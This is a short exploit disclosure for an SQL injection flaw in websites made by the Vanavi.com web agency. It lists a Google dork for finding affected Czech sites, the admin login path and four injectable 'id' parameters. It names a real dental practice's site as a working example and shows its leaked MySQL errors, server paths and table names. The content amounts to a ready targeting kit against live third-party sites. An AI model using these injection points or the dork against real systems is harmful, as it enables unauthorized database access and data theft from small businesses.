#################################################################################################
# Exploit Title : Created by Vanavi.com Digital Agency Web Design SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 05/10/2018
# Vendor Homepage : vanavi.com
# Tested On : Windows and Linux
# Category : WebApps
# Google Dork : intext:''Created by Vanavi.com'' site:cz
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
#################################################################################################
# Admin Panel Login Path :
/admin/login.php
# SQL Injection Exploit :
/eng/contact.php?id=[SQL Injection]
/eng/dentistry.php?id=[SQL Injection]
/eng/home.php?id=[SQL Injection]
/eng/implants.php?id=[SQL Injection]
#################################################################################################
# Example Vulnerable Site =>
tichy-zubar.cz/eng/contact.php?id=14%27 => [ Proof of Concept ] => archive.is/0BeT4
# SQL Database Error =>
You have an error in your SQL syntax; check the manual that corresponds to
your MySQL server version for the right syntax to use near ''1''' at line 1
Warning: mysql_query() [function.mysql-query]: Can't connect to local MySQL server through socket
'/var/run/mysqld/mysqld.sock' (2) in /var/home/www/tichy-zubar.cz/www/eng/inc/html.php on line 4
Chyba: Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock' (2)
Ve query: SELECT * FROM new_tichy_zubar_menu_en WHERE id = '14\''
Warning: mysql_query() [function.mysql-query]: A link to the server could not be
established in /var/home/www/tichy-zubar.cz/www/eng/inc/menu.php on line 6
Chyba: Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock' (2)
Ve query: SELECT * FROM new_tichy_zubar_site_map WHERE id_parent =
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################